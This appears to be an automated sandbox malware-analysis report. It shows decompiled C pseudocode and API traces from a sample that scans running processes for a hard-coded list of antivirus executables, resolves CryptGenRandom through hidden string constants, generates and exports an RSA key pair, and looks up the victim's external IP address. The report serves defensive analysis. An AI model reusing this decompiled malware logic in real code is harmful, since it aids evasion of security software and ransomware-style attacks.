VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F694C2D
ExitProcess.KERNEL32 ref: 0F694C35

Strings

open, xrefs: 0F694D90

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: a3883b75cd1ad50f9825260fc5c8254c8f0d6a8ecfad2bbf8eb3cb31be8fa345
Instruction ID: 798eb34a288b9ae8e357af5aeec6bd0bb09d62a97739ca53f86c2d1477dbeb0f
Opcode Fuzzy Hash: a3883b75cd1ad50f9825260fc5c8254c8f0d6a8ecfad2bbf8eb3cb31be8fa345
Instruction Fuzzy Hash: AC712C70A48309ABEF14DFE0DD5AFEE77BCEB04716F108108E601AA2C1DBB96945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F697B70 Relevance: 25.6, APIs: 17, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0F697B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0f697b8d
0x0f697b8f
0x0f697b9d
0x0f697b9f
0x0f697ba6
0x0f697bad
0x0f697bb4
0x0f697bbb
0x0f697bc2
0x0f697bc9
0x0f697bd0
0x0f697bd7
0x0f697bde
0x0f697be5
0x0f697bec
0x0f697bf3
0x0f697bfa
0x0f697c01
0x0f697c03
0x0f697c05
0x0f697c0a
0x0f697c34
0x0f697c3a
0x0f697c0c
0x0f697c10
0x0f697c16
0x0f697c1c
0x0f697c22
0x0f697c3f
0x0f697c41
0x0f697c43
0x0f697c46
0x0f697c49
0x0f697c4c
0x0f697c4f
0x0f697c57
0x00000000
0x0f697c60
0x0f697c68
0x0f697c70
0x0f697c7f
0x0f697c83
0x00000000
0x0f697c85
0x0f697c85
0x0f697c85
0x0f697ce7
0x0f697ce7
0x0f697cee
0x0f697cf6
0x00000000
0x00000000
0x00000000
0x0f697cf6
0x0f697c8e
0x0f697c8f
0x0f697c91
0x0f697c98
0x0f697cb5
0x0f697cbe
0x0f697c9a
0x0f697c9a
0x0f697ca7
0x0f697ca7
0x0f697cc0
0x0f697cde
0x0f697ce1
0x0f697ce4
0x00000000
0x0f697ce4
0x0f697d07
0x0f697d0b
0x0f697d0d
0x0f697d13
0x0f697d20
0x0f697d20
0x0f697d13
0x0f697d2b
0x0f697d2b
0x0f697d3b
0x0f697d40
0x0f697d46
0x0f697d4b
0x0f697d55
0x0f697d55
0x0f697d5f
0x0f697c24
0x0f697c2c
0x00000000
0x0f697c2c
0x0f697c22

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F697B8D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F697C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F697C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F697C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F697C4F
lstrcmpiW.KERNEL32(0F6A03AC,-00000024), ref: 0F697C75
Process32NextW.KERNEL32(?,?), ref: 0F697CEE
GetLastError.KERNEL32 ref: 0F697CF8
lstrlenW.KERNEL32(00000000), ref: 0F697D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F697D3B
FindCloseChangeNotification.KERNEL32(?), ref: 0F697D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0F697D55

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID:
API String ID: 1411803383-0
Opcode ID: 778b9dba52e57d3966a872bff42ab25b6169ba943051746ed074ebfd4868749d
Instruction ID: 5b619a8858ae5e963ff2bac8901e037a6450a6a4a24f123a4f82d97307ead626
Opcode Fuzzy Hash: 778b9dba52e57d3966a872bff42ab25b6169ba943051746ed074ebfd4868749d
Instruction Fuzzy Hash: C9517971A04218EFCF208FA4D848BAEBBB8FF89725F204159E500AB391C7766D55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0F6982B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0F6982B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x0f6982c0
0x0f6982c2
0x0f6982c7
0x0f6982ca
0x0f6982cd
0x0f6982d5
0x0f6983c9
0x0f6983d1
0x0f6982db
0x0f6982db
0x0f6982e0
0x0f6982e0
0x0f6982e3
0x0f6982e8
0x0f6982e9
0x0f6982f5
0x0f6982f5
0x0f6982fb
0x0f698301
0x0f698305
0x0f6983d7
0x0f6983e5
0x0f6983f3
0x0f698313
0x0f698316
0x0f69831e
0x0f698325
0x0f69832c
0x0f698332
0x0f698336
0x0f69833d
0x0f698344
0x0f69834b
0x0f69834f
0x0f698357
0x0f698367
0x0f698367
0x0f69836c
0x0f698374
0x00000000
0x0f698376
0x0f698376
0x0f698377
0x0f698378
0x0f69837f
0x00000000
0x0f698381
0x0f698381
0x0f698385
0x0f698387
0x0f69838a
0x0f698391
0x0f698395
0x0f69839e
0x0f6983a2
0x0f6983a3
0x0f698391
0x0f6983a7
0x0f6983a7
0x0f69837f
0x0f698359
0x0f698359
0x0f69835d
0x0f698365
0x0f6983ae
0x0f6983ae
0x00000000
0x00000000
0x00000000
0x0f698365
0x0f6983b5
0x0f6983c3
0x00000000
0x0f6983c3
0x0f698305

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F6982CD
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F6982FB
GetModuleHandleA.KERNEL32(?), ref: 0F69834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F69835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F69836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F6983B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F6983C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F6983D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F6983E5

Strings

Advapi32.dll, xrefs: 0F698359, 0F69835C
CryptGenRandomAdvapi32.dll, xrefs: 0F698367, 0F69836A

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: ff02733d2c107a7bf9e744ee1f3290b8dd7660f3a36f1c8ca8a04935f51f362c
Instruction ID: da0375adb3fa62803461c3e24f109b93b467c681b91d8f5902d71f700ec6a704
Opcode Fuzzy Hash: ff02733d2c107a7bf9e744ee1f3290b8dd7660f3a36f1c8ca8a04935f51f362c
Instruction Fuzzy Hash: CF311670A08209ABDF108FE5DC85BEEBBBCFF05715F54402DE901A7241E7759611CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0F698400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0F698400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				void* _t28;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
					_t47 = _t28;
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000); // executed
						goto L10;
					}
				}
			}

0x0f698410
0x0f698412
0x0f698417
0x0f69841d
0x0f698420
0x0f698428
0x0f6984f2
0x0f6984fa
0x0f69842e
0x0f69842e
0x0f698430
0x0f698430
0x0f698433
0x0f698437
0x0f698438
0x0f698444
0x0f698448
0x0f69844e
0x0f698452
0x0f698500
0x0f69850e
0x0f69851c
0x0f698461
0x0f698464
0x0f69846c
0x0f698473
0x0f69847a
0x0f698480
0x0f698484
0x0f69848b
0x0f698492
0x0f698499
0x0f69849d
0x0f6984a5
0x0f6984b5
0x0f6984b5
0x0f6984ba
0x0f6984c2
0x0f6984cd
0x0f6984d6
0x0f6984d6
0x0f6984a7
0x0f6984a7
0x0f6984ab
0x0f6984b3
0x00000000
0x00000000
0x0f6984b3
0x0f6984de
0x0f6984ec
0x00000000
0x0f6984ec
0x0f698452

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F698420
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F698448
GetModuleHandleA.KERNEL32(?), ref: 0F69849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F6984AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F6984BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F6984DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F6984EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F69292B), ref: 0F698500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F69292B), ref: 0F69850E

Strings

Advapi32.dll, xrefs: 0F6984A7, 0F6984AA
CryptGenRandomAdvapi32.dll, xrefs: 0F6984B5, 0F6984B8

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: a3f2e1b2f6fbc1c31f4aed60cc046c8fa8c6fb8d68773170ffadafb4d2b70015
Instruction ID: 3ee5afef2be28eb51fc668279e8824b815ed5510c12bae86427000d2f77e5204
Opcode Fuzzy Hash: a3f2e1b2f6fbc1c31f4aed60cc046c8fa8c6fb8d68773170ffadafb4d2b70015
Instruction Fuzzy Hash: 5331B371A04209AFDF10CFE5DC49BEEBFBCEF45716F504069E601E6280D7799A108B68

Uniqueness

Uniqueness Score: -1.00%

Function 0F6963E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0F6963E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f6963f4
0x0f6963f8
0x0f696400
0x0f696438
0x0f696446
0x0f69644a
0x0f696452
0x0f696452
0x0f696455
0x0f69646e
0x0f696486
0x0f696490
0x0f69649c
0x0f6964b1
0x00000000
0x0f6964b7
0x0f696402
0x0f69640d
0x00000000
0x0f696431
0x0f69641e
0x0f696426
0x00000000
0x0f69642f
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0F694B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F694B96,?,0F694B9E), ref: 0F6963F8
GetLastError.KERNEL32(?,0F694B9E), ref: 0F696402
CryptAcquireContextW.ADVAPI32(0F694B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F694B9E), ref: 0F69641E
CryptGenKey.ADVAPI32(0F694B9E,0000A400,08000001,?,?,0F694B9E), ref: 0F69644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F69646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F696486
CryptDestroyKey.ADVAPI32(?), ref: 0F696490
CryptReleaseContext.ADVAPI32(0F694B9E,00000000), ref: 0F69649C
CryptAcquireContextW.ADVAPI32(0F694B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F6964B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F6963ED, 0F696413, 0F6964A6

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: bec71d2a61ad4462adfaab3133bee51d85218a16ea1837d92a131b88423014f2
Instruction ID: 20911dc53e2502cd857aad4ee454296cc1513b6a23864323b872019dc1942d86
Opcode Fuzzy Hash: bec71d2a61ad4462adfaab3133bee51d85218a16ea1837d92a131b88423014f2
Instruction Fuzzy Hash: 02213075788305BBEF20CEE0DD4AFAE377DEB48B15F508504F601EA1C0D6BAA5509B61

Uniqueness

Uniqueness Score: -1.00%

Function 0F696FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0F697E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F698024
Part of subcall function 0F697E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F69803D

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0F69700F
lstrlenW.KERNEL32(0F69FF8C), ref: 0F69701C

Part of subcall function 0F698050: InternetCloseHandle.WININET(?), ref: 0F698063
Part of subcall function 0F698050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F698082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F69FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F69704B
wsprintfW.USER32 ref: 0F697063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F69FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F697079
InternetCloseHandle.WININET(?), ref: 0F697087

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0F69703C
GET, xrefs: 0F697024

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: c52209a2b3da530d9a3155c1ce467cb38eb1983d6b37726dedd4868d74908a08
Instruction ID: 2c68e2f287ea3fa30ce8538925c3f8fab7d56b6924847fe5349a6885eec72f07
Opcode Fuzzy Hash: c52209a2b3da530d9a3155c1ce467cb38eb1983d6b37726dedd4868d74908a08
Instruction Fuzzy Hash: CB0188357482007BDF206FB69D4EF9F3E6DEF86B22F100024FA05E21C1DE699525C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F692F50 Relevance: 10.6, APIs: 7, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0F692F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0f692f5a
0x0f692f69
0x0f692f6d
0x0f692f74
0x0f692f76
0x0f692f7b
0x0f692f8d
0x0f692f93
0x0f692f97
0x0f692fa8
0x0f692fac
0x0f692ff2
0x0f692ffa
0x0f693008
0x0f692fae
0x0f692fb1
0x0f692fb3
0x0f692fb8
0x0f692fc0
0x0f692fc5
0x0f692fcf
0x0f692fd7
0x00000000
0x0f692fd9
0x0f692fe3
0x0f692feb
0x0f693011
0x0f693022
0x00000000
0x00000000
0x00000000
0x0f692feb
0x00000000
0x0f692fed
0x0f692fed
0x0f692fee
0x0f692fc0
0x00000000
0x0f692fb8
0x0f692f99
0x0f692f9e
0x0f692f9e
0x0f692f81
0x0f692f81
0x0f692f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F692F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F692F8D

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID:
API String ID: 4140748134-0
Opcode ID: 7e57712194f371cfb1094e5f737bd10b1a0b48f61542011f47c96f80116019c1
Instruction ID: 3520e35240e8a7c43291413a320911a38f2a02bb97ba5d03da1c63cecc9ebe0d
